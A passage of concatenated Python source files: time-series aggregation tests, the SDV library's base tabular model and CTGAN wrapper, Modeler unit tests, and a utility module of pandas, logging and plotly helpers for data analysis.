expected_values = np.array([[2], [2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column=0)
def test_pandas_dataframe(self):
X = pd.DataFrame([
[1, 1],
[2, 3],
[3, 1],
[4, 3]
], columns=['timestamp', 'value'])
interval = 2
expected_values = np.array([[2], [2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column="timestamp")
class TimeSegmentsAggregateTest(TestCase):
def _run(self, X, interval, expected_values, expected_index, time_column, method=['mean']):
values, index = time_segments_aggregate(X, interval, time_column, method=method)
assert_allclose(values, expected_values)
assert_allclose(index, expected_index)
def test_array(self):
X = np.array([[1, 1], [2, 3], [3, 1], [4, 3]])
interval = 2
expected_values = np.array([[2], [2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column=0)
def test_pandas_dataframe(self):
X = pd.DataFrame([
[1, 1],
[2, 3],
[3, 1],
[4, 3]
], columns=['timestamp', 'value'])
interval = 2
expected_values = np.array([[2], [2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column="timestamp")
def test_multiple(self):
X = np.array([[1, 1], [2, 3], [3, 1], [4, 3]])
interval = 2
expected_values = np.array([[2, 2], [2, 2]])
expected_index = np.array([1, 3])
self._run(X, interval, expected_values, expected_index, time_column=0,
method=['mean', 'median'])
``` |
{
"source": "joanvaquer/SDV",
"score": 3
} |
#### File: sdv/tabular/base.py
```python
import logging
import pickle
from sdv.metadata import Table
LOGGER = logging.getLogger(__name__)
class NonParametricError(Exception):
"""Exception to indicate that a model is not parametric."""
class BaseTabularModel():
"""Base class for all the tabular models.
The ``BaseTabularModel`` class defines the common API that all the
TabularModels need to implement, as well as common functionality.
Args:
field_names (list[str]):
List of names of the fields that need to be modeled
and included in the generated output data. Any additional
fields found in the data will be ignored and will not be
included in the generated output.
If ``None``, all the fields found in the data are used.
field_types (dict[str, dict]):
Dictionary specifying the data types and subtypes
of the fields that will be modeled. Field types and subtypes
combinations must be compatible with the SDV Metadata Schema.
field_transformers (dict[str, str]):
Dictionary specifying which transformers to use for each field.
Available transformers are:
* ``integer``: Uses a ``NumericalTransformer`` of dtype ``int``.
* ``float``: Uses a ``NumericalTransformer`` of dtype ``float``.
* ``categorical``: Uses a ``CategoricalTransformer`` without gaussian noise.
* ``categorical_fuzzy``: Uses a ``CategoricalTransformer`` adding gaussian noise.
* ``one_hot_encoding``: Uses a ``OneHotEncodingTransformer``.
* ``label_encoding``: Uses a ``LabelEncodingTransformer``.
* ``boolean``: Uses a ``BooleanTransformer``.
* ``datetime``: Uses a ``DatetimeTransformer``.
anonymize_fields (dict[str, str]):
Dict specifying which fields to anonymize and what faker
category they belong to.
primary_key (str):
Name of the field which is the primary key of the table.
constraints (list[Constraint, dict]):
List of Constraint objects or dicts.
table_metadata (dict or metadata.Table):
Table metadata instance or dict representation.
If given alongside any other metadata-related arguments, an
exception will be raised.
If not given at all, it will be built using the other
arguments or learned from the data.
"""
_DTYPE_TRANSFORMERS = None
_metadata = None
def __init__(self, field_names=None, field_types=None, field_transformers=None,
anonymize_fields=None, primary_key=None, constraints=None, table_metadata=None):
if table_metadata is None:
self._metadata = Table(
field_names=field_names,
primary_key=primary_key,
field_types=field_types,
anonymize_fields=anonymize_fields,
constraints=constraints,
dtype_transformers=self._DTYPE_TRANSFORMERS,
)
else:
arg_names = ('field_names', 'primary_key', 'field_types', 'anonymize_fields', 'constraints')
for arg_name, arg in zip(arg_names, (field_names, primary_key, field_types, anonymize_fields, constraints)):
if arg:
# plain values have no __name__ attribute, so report the argument name explicitly
raise ValueError(
'If table_metadata is given {} must be None'.format(arg_name))
if isinstance(table_metadata, dict):
table_metadata = Table.from_dict(table_metadata)
self._metadata = table_metadata
def fit(self, data):
"""Fit this model to the data.
If the table metadata has not been given, learn it from the data.
Args:
data (pandas.DataFrame or str):
Data to fit the model to. It can be passed as a
``pandas.DataFrame`` or as an ``str``.
If an ``str`` is passed, it is assumed to be
the path to a CSV file which can be loaded using
``pandas.read_csv``.
"""
if not self._metadata.fitted:
self._metadata.fit(data)
self._num_rows = len(data)
transformed = self._metadata.transform(data)
self._fit(transformed)
def get_metadata(self):
"""Get metadata about the table.
This will return an ``sdv.metadata.Table`` object containing
the information about the data that this model has learned.
This Table metadata will contain some common information,
such as field names and data types, as well as additional
information that each Sub-class might add, such as the
observed data field distributions and their parameters.
Returns:
sdv.metadata.Table:
Table metadata.
"""
return self._metadata
def sample(self, num_rows=None, max_retries=100):
"""Sample rows from this table.
Args:
num_rows (int):
Number of rows to sample. If not given the model
will generate as many rows as there were in the
data passed to the ``fit`` method.
max_retries (int):
Number of times to retry sampling discarded rows.
Defaults to 100.
Returns:
pandas.DataFrame:
Sampled data.
"""
num_rows = num_rows or self._num_rows
num_to_sample = num_rows
sampled = self._sample(num_to_sample)
sampled = self._metadata.reverse_transform(sampled)
sampled = self._metadata.filter_valid(sampled)
num_valid = len(sampled)
counter = 0
while num_valid < num_rows:
counter += 1
if counter >= max_retries:
raise ValueError('Could not get enough valid rows within {} trials'.format(max_retries))
invalid = num_rows - num_valid
remaining = num_rows - num_valid
proportion = counter * num_rows / num_valid
num_to_sample = int(remaining * proportion)
LOGGER.info('%s invalid rows found. Resampling %s rows', invalid, num_to_sample)
resampled = self._sample(num_to_sample)
resampled = self._metadata.reverse_transform(resampled)
sampled = sampled.append(resampled)
sampled = self._metadata.filter_valid(sampled)
num_valid = len(sampled)
return sampled.head(num_rows)
def get_parameters(self):
"""Get the parameters learned from the data.
The result is a flat dict (single level) which contains
all the necessary parameters to be able to reproduce
this model.
Subclasses which are not parametric, such as DeepLearning
based models, raise a NonParametricError indicating that
this method is not supported for their implementation.
Returns:
parameters (dict):
flat dict (single level) which contains all the
necessary parameters to be able to reproduce
this model.
Raises:
NonParametricError:
If the model is not parametric or cannot be described
using a simple dictionary.
"""
raise NonParametricError()
def set_parameters(self, parameters):
"""Regenerate a previously learned model from its parameters.
Subclasses which are not parametric, such as DeepLearning
based models, raise a NonParametricError indicating that
this method is not supported for their implementation.
Args:
dict:
Model parameters.
Raises:
NonParametricError:
If the model is not parametric or cannot be described
using a simple dictionary.
"""
raise NonParametricError()
def save(self, path):
"""Save this model instance to the given path using pickle.
Args:
path (str):
Path where the SDV instance will be serialized.
"""
with open(path, 'wb') as output:
pickle.dump(self, output)
@classmethod
def load(cls, path):
"""Load a TabularModel instance from a given path.
Args:
path (str):
Path from which to load the instance.
Returns:
TabularModel:
The loaded tabular model.
"""
with open(path, 'rb') as f:
return pickle.load(f)
```
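To make the contract above concrete, here is a minimal, hypothetical subclass: `fit` and `sample` in the base class handle metadata, transforms, validity filtering and retries, so a subclass only supplies `_fit` and `_sample` over the transformed table. `ResampleModel` is an illustration invented here, not part of SDV; it simply memorises the transformed rows and redraws them.
```python
from sdv.tabular.base import BaseTabularModel


class ResampleModel(BaseTabularModel):
    """Toy model: memorise the transformed table and sample rows from it with replacement."""

    # Mirrors the CTGAN wrapper below; an assumption, not a requirement of the base class.
    _DTYPE_TRANSFORMERS = {'O': 'label_encoding'}

    def _fit(self, table_data):
        # table_data is the numerically transformed table produced by the metadata.
        self._table = table_data

    def _sample(self, num_rows):
        # The base class reverse-transforms and validity-filters whatever is returned here.
        return self._table.sample(num_rows, replace=True).reset_index(drop=True)


# Usage sketch (left as comments):
#   model = ResampleModel()
#   model.fit(some_dataframe)
#   synthetic = model.sample(10)
```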
#### File: sdv/tabular/ctgan.py
```python
from sdv.tabular.base import BaseTabularModel
class CTGAN(BaseTabularModel):
"""Model wrapping ``CTGANSynthesizer`` model.
Args:
field_names (list[str]):
List of names of the fields that need to be modeled
and included in the generated output data. Any additional
fields found in the data will be ignored and will not be
included in the generated output.
If ``None``, all the fields found in the data are used.
field_types (dict[str, dict]):
Dictinary specifying the data types and subtypes
of the fields that will be modeled. Field types and subtypes
combinations must be compatible with the SDV Metadata Schema.
field_transformers (dict[str, str]):
Dictionary specifying which transformers to use for each field.
Available transformers are:
* ``integer``: Uses a ``NumericalTransformer`` of dtype ``int``.
* ``float``: Uses a ``NumericalTransformer`` of dtype ``float``.
* ``categorical``: Uses a ``CategoricalTransformer`` without gaussian noise.
* ``categorical_fuzzy``: Uses a ``CategoricalTransformer`` adding gaussian noise.
* ``one_hot_encoding``: Uses a ``OneHotEncodingTransformer``.
* ``label_encoding``: Uses a ``LabelEncodingTransformer``.
* ``boolean``: Uses a ``BooleanTransformer``.
* ``datetime``: Uses a ``DatetimeTransformer``.
anonymize_fields (dict[str, str]):
Dict specifying which fields to anonymize and what faker
category they belong to.
primary_key (str):
Name of the field which is the primary key of the table.
constraints (list[Constraint, dict]):
List of Constraint objects or dicts.
table_metadata (dict or metadata.Table):
Table metadata instance or dict representation.
If given alongside any other metadata-related arguments, an
exception will be raised.
If not given at all, it will be built using the other
arguments or learned from the data.
epochs (int):
Number of training epochs. Defaults to 300.
log_frequency (boolean):
Whether to use log frequency of categorical levels in conditional
sampling. Defaults to ``True``.
embedding_dim (int):
Size of the random sample passed to the Generator. Defaults to 128.
gen_dim (tuple or list of ints):
Size of the output samples for each one of the Residuals. A Residual Layer
will be created for each one of the values provided. Defaults to (256, 256).
dis_dim (tuple or list of ints):
Size of the output samples for each one of the Discriminator Layers. A Linear
Layer will be created for each one of the values provided. Defaults to (256, 256).
l2scale (float):
Weight decay for the Adam Optimizer. Defaults to 1e-6.
batch_size (int):
Number of data samples to process in each step. Defaults to 500.
"""
_CTGAN_CLASS = None
_model = None
_DTYPE_TRANSFORMERS = {
'O': 'label_encoding'
}
def __init__(self, field_names=None, field_types=None, field_transformers=None,
anonymize_fields=None, primary_key=None, constraints=None, table_metadata=None,
epochs=300, log_frequency=True, embedding_dim=128, gen_dim=(256, 256),
dis_dim=(256, 256), l2scale=1e-6, batch_size=500):
super().__init__(
field_names=field_names,
primary_key=primary_key,
field_types=field_types,
anonymize_fields=anonymize_fields,
constraints=constraints,
table_metadata=table_metadata
)
try:
from ctgan import CTGANSynthesizer # Lazy import to make dependency optional
self._CTGAN_CLASS = CTGANSynthesizer
except ImportError as ie:
ie.msg += (
'\n\nIt seems like `ctgan` is not installed.\n'
'Please install it using:\n\n pip install sdv[ctgan]'
)
raise
self._embedding_dim = embedding_dim
self._gen_dim = gen_dim
self._dis_dim = dis_dim
self._l2scale = l2scale
self._batch_size = batch_size
self._epochs = epochs
self._log_frequency = log_frequency
def _fit(self, table_data):
"""Fit the model to the table.
Args:
table_data (pandas.DataFrame):
Data to be learned.
"""
self._model = self._CTGAN_CLASS(
embedding_dim=self._embedding_dim,
gen_dim=self._gen_dim,
dis_dim=self._dis_dim,
l2scale=self._l2scale,
batch_size=self._batch_size,
)
categoricals = [
field
for field, meta in self._metadata.get_fields().items()
if meta['type'] == 'categorical'
]
self._model.fit(
table_data,
epochs=self._epochs,
discrete_columns=categoricals,
log_frequency=self._log_frequency,
)
def _sample(self, num_rows):
"""Sample the indicated number of rows from the model.
Args:
num_rows (int):
Amount of rows to sample.
Returns:
pandas.DataFrame:
Sampled data.
"""
return self._model.sample(num_rows)
```
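A minimal end-to-end sketch of the wrapper above. It assumes `ctgan` is installed and that the class is importable as `sdv.tabular.CTGAN`; the toy dataframe is far too small to train a meaningful model and only illustrates the call sequence.
```python
import pandas as pd
from sdv.tabular import CTGAN

data = pd.DataFrame({
    'age': [23, 45, 31, 52, 38, 27],
    'city': ['LON', 'NYC', 'NYC', 'LON', 'BCN', 'BCN'],  # detected as categorical
})

model = CTGAN(epochs=5)        # tiny epoch count, purely illustrative
model.fit(data)                # learns metadata, transforms, trains CTGANSynthesizer
synthetic = model.sample(10)   # 10 synthetic rows with the same columns

model.save('ctgan_demo.pkl')   # pickled via BaseTabularModel.save
restored = CTGAN.load('ctgan_demo.pkl')
```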
#### File: SDV/tests/test_modeler.py
```python
from unittest import TestCase
from unittest.mock import Mock, call
import pandas as pd
from sdv.metadata import Metadata
from sdv.modeler import Modeler
from sdv.models.base import SDVModel
from sdv.models.copulas import GaussianCopula
class TestModeler(TestCase):
def test___init__default(self):
"""Test create new Modeler instance with default values"""
# Run
modeler = Modeler('test')
# Asserts
assert modeler.models == dict()
assert modeler.metadata == 'test'
assert modeler.model == GaussianCopula
assert modeler.model_kwargs == dict()
def test___init__with_arguments(self):
# Run
model = Mock()
modeler = Modeler({'some': 'metadata'}, model=model, model_kwargs={'some': 'kwargs'})
# Asserts
assert modeler.models == dict()
assert modeler.metadata == {'some': 'metadata'}
assert modeler.model == model
assert modeler.model_kwargs == {'some': 'kwargs'}
def test__get_extensions(self):
"""Test get list of extensions from childs"""
# Setup
model = Mock(spec=SDVModel)
model.return_value = model
model.get_parameters.side_effect = [
{'model': 'data 1'},
{'model': 'data 2'},
{'model': 'data 3'}
]
modeler = Mock(spec=Modeler)
modeler.model = model
modeler.model_kwargs = dict()
modeler.metadata = Mock(spec=Metadata)
# Run
child_table = pd.DataFrame({'foo': ['aaa', 'bbb', 'ccc']})
result = Modeler._get_extension(modeler, 'some_name', child_table, 'foo')
# Asserts
expected = pd.DataFrame({
'__some_name__model': ['data 1', 'data 2', 'data 3'],
'__some_name__child_rows': [1, 1, 1]
}, index=['aaa', 'bbb', 'ccc'])
pd.testing.assert_frame_equal(result, expected)
assert model.get_parameters.call_count == 3
def test_cpa_with_tables_no_primary_key(self):
"""Test CPA with tables and no primary key."""
# Setup
modeler = Mock(spec=Modeler)
modeler.metadata = Mock(spec=Metadata)
modeler.model = Mock(spec=SDVModel)
modeler.model_kwargs = dict()
modeler.models = dict()
modeler.table_sizes = {'data': 5}
modeler.metadata.transform.return_value = pd.DataFrame({'data': [1, 2, 3]})
modeler.metadata.get_primary_key.return_value = None
# Run
tables = {'test': pd.DataFrame({'data': ['a', 'b', 'c']})}
result = Modeler.cpa(modeler, 'test', tables)
# Asserts
expected = pd.DataFrame({'data': [1, 2, 3]})
expected_transform_call = pd.DataFrame({'data': ['a', 'b', 'c']})
assert modeler.metadata.load_table.call_count == 0
assert modeler.metadata.transform.call_args[0][0] == 'test'
pd.testing.assert_frame_equal(
modeler.metadata.transform.call_args[0][1],
expected_transform_call
)
pd.testing.assert_frame_equal(result, expected)
def test_model_database(self):
"""Test model using RCPA"""
# Setup
def rcpa_side_effect(table_name, tables):
tables[table_name] = table_name
metadata_table_names = ['foo', 'bar', 'tar']
metadata_parents = [None, 'bar_parent', None]
modeler = Mock()
modeler.metadata.get_tables.return_value = metadata_table_names
modeler.metadata.get_parents.side_effect = metadata_parents
modeler.rcpa.side_effect = rcpa_side_effect
modeler.models = dict()
# Run
Modeler.model_database(modeler)
# Asserts
expected_metadata_parents_call_count = 3
expected_metadata_parents_call = [call('foo'), call('bar'), call('tar')]
assert modeler.metadata.get_parents.call_count == expected_metadata_parents_call_count
assert modeler.metadata.get_parents.call_args_list == expected_metadata_parents_call
``` |
{
"source": "joanvelro/IA_resources",
"score": 3
} |
#### File: joanvelro/IA_resources/dl_ia_utils.py
```python
def dl_ia_utils_change_directory(path):
""" Change the working directory to the given path and add it to sys.path
:param path: e.g. 'path/to/app/'
"""
import os
import sys
os.chdir(path)
sys.path.insert(1, path)
def dl_ia_utils_set_up_logger(path):
""" Set up logger
:arg path: path where to store logs, example: 'logs\\dl-ia-cla-predictive'
"""
import logging
logger = logging.getLogger(path)
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('{}.log'.format(path))
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)  # add the file handler once, after the formatter is set
logging.getLogger().addHandler(logging.StreamHandler())  # also display messages in the console
# logger.debug('debug message')
# logger.info('info message')
# logger.warning('warning message')
# logger.error('error message')
# logger.critical('critical message')
def dl_ia_utils_systems_info():
""" Function that shows the system properties
"""
import sys
from platform import python_version
print('Python version:{}'.format(python_version()))
print('Python system version:{}'.format(sys.version))
print('Path:{}'.format(sys.executable))
print('Python version info:{}'.format(sys.version_info))
def dl_ia_utils_config_plotly():
""" this function configures the plotly visualization
:return:
"""
import plotly.io as pio
import plotly.graph_objects as go
import plotly.express as px
pio.renderers.default = "browser"
def dl_ia_utils_config_matplotlib():
""" this function configures the matplotlib style
:return:
"""
from matplotlib import rc
rc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})
rc('font', **{'family': 'serif', 'serif': ['Times']})
rc('text', usetex=True)
def dl_ia_utils_config_pandas():
"""
Configure pandas display options for the console and limit pandas warnings
"""
import pandas as pd
import numpy as np
pd.options.mode.chained_assignment = None # default='warn'
desired_width = 350
np.set_printoptions(linewidth=desired_width) # show dataframes in console
pd.set_option('display.max_columns', 10)
def dl_ia_utils_check_folder(path_folder):
""" check that exists a folder, and if not, create it
:param path_folder: string with the path
:return error: error code (0:good, 1:bad)
"""
import os
error = 0
try:
if not os.path.isdir(path_folder):
print('Creating folder: {} '.format(path_folder))
os.mkdir(path_folder)
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_check_folder: ' + str(exception_msg))
error = 1
return error
#############################################################
# ---------- DATA ANALYSIS ---------------------------------#
#############################################################
def dl_ia_utils_memory_usage(df):
""" Calculate and print the memory usage and shape by the dataframe
:param df:
:return:
"""
error = 0
try:
print('{} Data Frame Memory usage: {:2.2f} GB'.format('-' * 20, df.memory_usage(deep=True).sum() / 1000000000))
print('{} Data Frame Shape: {} '.format('-' * 20, df.shape))
except Exception as exception_msg:
error = 1
print('(!) Error in dl_ia_utils_memory_usage: ' + str(exception_msg))
return error
def dl_ia_utils_filter_by_std(df, variable, option):
""" Keep only the rows whose value of `variable` lies within one (option=1)
or two (option=2) standard deviations of the mean.
"""
if option == 2:
df_aux = df[(df[variable] < (df[variable].mean() + 2 * df[variable].std()))
& (df[variable] > (df[variable].mean() - 2 * df[variable].std()))]
elif option == 1:
df_aux = df[(df[variable] < (df[variable].mean() + df[variable].std()))
& (df[variable] > (df[variable].mean() - df[variable].std()))]
print('Rows dropped:{} %'.format(round(100 * (1 - (len(df_aux) / len(df))), 3)))
return df_aux
def dl_ia_utils_subs_zeros_values(y):
""" subs zero values from from an array by values close to zeros 1e-10
e.g.: y = np.array([1,4,2,3,7,8,0,0,8,7,0,0,9,8])
:param y:
:return:
"""
import pandas as pd
df = pd.DataFrame({'y': y})
df.loc[df['y'] == 0, ['y']] = 1e-9
return df['y'].values
def dl_ia_utils_create_datestring(row):
"""
df['date'] = df.apply(lambda row: create_date(row), axis=1)
"""
try:
return row['TIMESTAMP'].strftime('%Y-%m-%d')
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_create_datestring: ' + str(exception_msg))
def dl_ia_utils_create_time_array(start, end, freq):
""" function that creates an array of times
:param start: string with the initial time (e.g.: 00:00:00)
:param end: string with the end time (e.g.: 23:59:59)
:param freq: string indicating the frequency (e.g.: 15min)
:return: array of time
"""
import pandas as pd
t = pd.DataFrame({'t': pd.date_range(start=start, end=end, freq=freq)}).t.dt.date
return t
def dl_ia_utils_create_date(row):
""" create date with year, month and day
:param row: lambda variable regarding columns of the dataframe
:return datetime:
"""
import pandas as pd
try:
return pd.Timestamp(int(row['YEAR']), int(row['MONTH']), int(row['DAY']))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_create_date: ' + str(exception_msg))
def dl_ia_utils_create_time(row):
""" convert values of HOUR and MINUTE to datetime
:param row: lambda variable regarding columns of the dataframe
:return datetime:
"""
import datetime
try:
return datetime.time(int(row['HOUR']), int(row['MINUTE']), int(row['SECOND']))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_create_time: ' + str(exception_msg))
def dl_ia_utils_create_timestamp(row):
""" create date with year, month and day
:param row: lambda variable regarding columns of the dataframe
:return datetime:
"""
import pandas as pd
try:
return pd.Timestamp(int(row['YEAR']), int(row['MONTH']), int(row['DAY']), int(row['HOUR']), int(row['MINUTE']))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_create_timestamp: ' + str(exception_msg))
def dl_ia_utils_create_datetime(row):
""" create datetime with hour and minute
:param row: lambda variable regarding columns of the dataframe
:return datetime:
"""
import datetime
try:
return datetime.time(int(row['HOUR']), int(row['MINUTE']))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_create_datetime: ' + str(exception_msg))
def dl_ia_utils_read_csv_per_chunks(path):
""" This function read a large csv file into a dataframe per chunks
:param path:
:return df: dataframe
"""
import pandas as pd
chunksize_ = 1000
error = 0
try:
TextFileReader = pd.read_csv(path, sep=";", chunksize=chunksize_)
dfList = []
for df in TextFileReader:
dfList.append(df)
df = pd.concat(dfList, sort=False)
return error, df
except Exception as exception_msg:
print("Error in read_csv_per_chunks {}".format(exception_msg))
# raise
error = 1
df = []
return error, df
def dl_ia_utils_vertical_translation(y):
""" detects in exist a zero value and translate the time series with the minimum value
:param y:
:return:
"""
import numpy as np
if np.isin(0, y):
# exists a zero value, find the minimum distinct from zero
delta = np.min(y[y > 0])
# vertical translation
# ym = y + delta
ym = y + 1
return ym
return y
def dl_ia_utils_get_unique_values(df_in):
""" this function calculate the unique values of the column of a data frame
:param df_in: dataframe with the columns of interest
:return dict_out: dictionary with unique values of the columns
"""
import numpy as np
dict_out = dict()
for column in df_in.columns:
dict_out[column] = np.sort(df_in[column].unique())
return dict_out
def dl_ia_utils_quarter_classify(x):
""" classify a variabel x into four cuadrants
:param x: value with values in (0,60)
:return y: values with values in (1,2,3,4)
"""
if x <= 15:
y = 0
if 30 >= x > 15:
y = 15
if 45 >= x > 30:
y = 30
if x > 45:
y = 45
return y
def dl_ia_utils_quarter_groups(x):
""" classify a variabel x into four cuadrants
:param x: value with values in (0,60)
:return y: values with values in (1,2,3,4)
"""
if x <= 15:
y = 1
if 30 >= x > 15:
y = 2
if 45 >= x > 30:
y = 3
if x > 45:
y = 4
return y
def dl_ia_utils_check_null_values(df):
"""
:param df:
:return df:
"""
# check nans
if df.isna().sum().sum() > 0:
print('(!) NAN Values detected')
print(df.isna().sum())
df.dropna(inplace=True)
return df
elif df.isnull().sum().sum() > 0:
print('(!) NULLs Values detected')
print(df.isnull().sum())
df.dropna(inplace=True)
return df
else:
print('Everything ok')
return df
def dl_ia_utils_comm(msg):
""" Funtion to show mesages in terminal
:parm msg: meassge (str)
:return:
"""
print('{} {}'.format('-' * 20, msg))
#############################################################
# ------------------- EDA ---------------------------------#
#############################################################
def dl_ia_utils_check_descriptive_statistics(df):
""" calculate descriptive statiscs of a dataframe columns
:param df: dataframe with columns of interest
:return error: error code (0:ok, 1: something wrong)
"""
error = 0
try:
for variable in df.columns:
print('variable:{}{}'.format(' ' * 2, variable))
print('---------------')
print('Mean Value:{}{}'.format(' ' * 2, round(df[variable].mean(), 2)))
print('std Value:{}{}'.format(' ' * 3, round(df[variable].std(), 2)))
print('Q3.:{}{}'.format(' ' * 9, round(df[variable].quantile(0.75), 2)))
print('Max.:{}{}'.format(' ' * 8, round(df[variable].max(), 2)))
print('Q2 :{}{}'.format(' ' * 2, round(df[variable].median(), 2)))
print('Min.:{}{}'.format(' ' * 8, round(df[variable].min(), 2)))
print('Q1.:{}{}'.format(' ' * 9, round(df[variable].quantile(0.25), 2)))
print('IQR.:{}{}'.format(' ' * 8, round(df[variable].quantile(0.75) - df[variable].quantile(0.25), 2)))
return error
except Exception as exception_msg:
print('{} (!) Error in dl_ia_utils_check_descriptive_statistics: '.format('-' * 20) + str(exception_msg))
error = 1
return error
#############################################################
# ------------------ PLOTS ---------------------------------#
#############################################################
def dl_ia_utils_plot_timeseries(df, var_x, var_y):
"""
:param df:
:param var_x:
:param var_y:
:return:
"""
import plotly.graph_objects as go
show = True
print_ = True
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y],
marker=dict(color='red'),
mode='markers+lines',
name=var_y))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Time series',
xaxis_title=var_x,
yaxis_title=var_y,
showlegend=True
)
if show:
fig.show()
if print_:
fig.write_html("figures\\timeseries_{}.html".format(var_y))
def dl_ia_utils_plot_line(df, var_x, var_y, var_group):
"""
:param df:
:param var_x:
:param var_y:
:param var_group:
:return:
"""
import plotly.express as px
show = True
print_ = True
fig = px.line(df,
x=var_x,
y=var_y,
color=var_group,
)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
if show:
fig.show()
if print_:
fig.write_html("figures\\line_plot_simple_{}_{}.html".format(var_x, var_y))
def dl_ia_utils_plot_marginal_dist_plot(df, var_x, var_y):
"""
:param df:
:param var_x:
:param var_y:
:return:
"""
import plotly.express as px
show = True
print_ = True
fig = px.density_heatmap(df,
x=var_x, # title="Click on the legend items!"
y=var_y, # add color="species",
marginal_x="box", # histogram, rug
marginal_y="violin")
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
if show:
fig.show()
if print_:
fig.write_html("figures\\plot_marginal_dist_plot_{}_{}.html".format(var_x, var_y))
def dl_ia_utils_plot_scatter_with_facets(df, var_x, var_y, var_color, var_group):
"""
:param df:
:param var_x:
:param var_y:
:param var_color:
:param var_group:
:return:
"""
import plotly.express as px
show = True
print_ = True
fig = px.scatter(df,
x=var_x,
y=var_y,
color=var_color,
facet_col=var_group,
marginal_x="box") # violin, histogram, rug
fig.update_layout(font=dict(family="Courier New, monospace",
size=18,
color="#7f7f7f"))
if show:
fig.show()
if print_:
fig.write_html("figures\\plot_scatter_with_facets_{}_{}_{}_{}.html".format(var_x, var_y, var_color, var_group))
def dl_ia_utils_plot_multi_timeseries():
start = '2018-05-01 00:00:00'
end = '2018-05-15 00:00:00'
df_aux = df[(df['DATE'] > start) & (df['DATE'] < end)]
fig = go.Figure()
fig.add_trace(go.Scatter(x=df_aux['DATE'],
y=df_aux['TOTAL_VEHICULOS'] * 4,
name='Real'))
fig.add_trace(go.Scatter(x=df_aux['DATE'],
y=df_aux['TOTAL_VEHICULOS_DESCRIPTIVE'] * 4,
name='Descriptive Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_desc, MAE_desc)))
fig.add_trace(go.Scatter(x=df_aux['DATE'],
y=df_aux['TOTAL_VEHICLES_RF_PREDICTION'] * 4,
name='Random Forest Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_rf,
MAE_rf)))
fig.add_trace(go.Scatter(x=df_aux['DATE'],
y=df_aux['TOTAL_VEHICLES_NN_PREDICTION'] * 4,
mode='lines',
marker_color='rgba(152, 0, 0, .8)',
name='Neural Network Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_nn,
MAE_nn)))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Predictive results - Segment: {} - Dates: {} to {}'.format(segments[seg],
start[0:10],
end[0:10]),
xaxis_title='Time (15 min. resolution)',
yaxis_title='Flow (veh./h)',
showlegend=True
)
fig.update_layout(legend=dict(x=0, y=-0.5, bgcolor="white"))
fig.show()
def dl_ia_utils_plot_multi_timeseries_with_slider():
fig = go.Figure()
fig.add_trace(go.Scatter(x=df['DATE'],
y=df['TOTAL_VEHICULOS'],
name='Real Data'))
fig.add_trace(go.Scatter(x=df['DATE'],
y=df['TOTAL_VEHICULOS_DESCRIPTIVE'],
name='Descriptive Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_desc, MAE_desc)))
fig.add_trace(go.Scatter(x=df['DATE'],
y=df['TOTAL_VEHICLES_RF_PREDICTION'],
name='Random Forest Predictive Model (R2:{:2.2f} / MAE:{:2.2f}%)'.format(r2_rf,
MAE_rf)))
# Set x-axis title
fig.update_xaxes(title_text="Time")
# Set y-axes titles
fig.update_yaxes(title_text="Total Vehicles")
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='AUSOL - Road Traffic Flow - Segment: {}'.format(segments[seg]),
showlegend=True
)
fig.update_layout(legend=dict(x=0, y=-1.0, bgcolor="white"))
# Add range slider
fig.update_layout(
xaxis=go.layout.XAxis(
rangeslider=dict(
visible=True
),
type="date"
)
)
fig.show()
def dl_ia_utils_plot_histogram(df, variable, n_bins_, label):
""" plot a histogram using plotly from a vairable in a dataframe
:param df: Data frame with the variable
:param variable: name of the variable (column name)
:param n_bins_: number of bins of the histogram
:param label: string with a name for the title
:return error: error code 0: everything ok, 1: something happened
"""
import plotly.express as px
import numpy as np
print_ = True
show = True
fontsize_ = 18
error = 0
try:
max_value = int(df[variable].max())
x_axis = np.arange(0, max_value, int(max_value / 20))
fig = px.histogram(df, x=variable, nbins=n_bins_, marginal="box")
fig.update_xaxes(title_text=variable)
fig.update_layout(font=dict(family="Courier New, monospace", size=fontsize_, color="#7f7f7f"))
fig.update_layout(title='Histogram - {} - {}'.format(label, variable))
fig.update_layout(showlegend=True)
fig.update_traces(opacity=0.9)
fig.update_layout(bargap=0.2) # gap between bars of adjacent location coordinates
fig.update_xaxes(ticktext=x_axis, tickvals=x_axis)
if print_:
fig.write_html("figures\\plot_histogram_{}.html".format(variable))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in plot_histogram: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_time_series_plot(time_index, y1, label1, title):
""" Plot one single time series
:param time_index:
:param y1:
:param y2:
:param label1:
:param label2:
:return:
"""
import plotly.graph_objects as go
print_ = True
show = True
# title = 'time_series_comparison'
fig = go.Figure()
fig.add_trace(go.Scatter(x=time_index,
y=y1,
mode='markers+lines',
marker=dict(color='red'),
name='{}'.format(label1)))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(showlegend=True)
fig.update_yaxes(title_text=label1)
fig.update_xaxes(title_text='Time')
fig.update_layout(title=title)
# Add range slider
fig.update_layout(
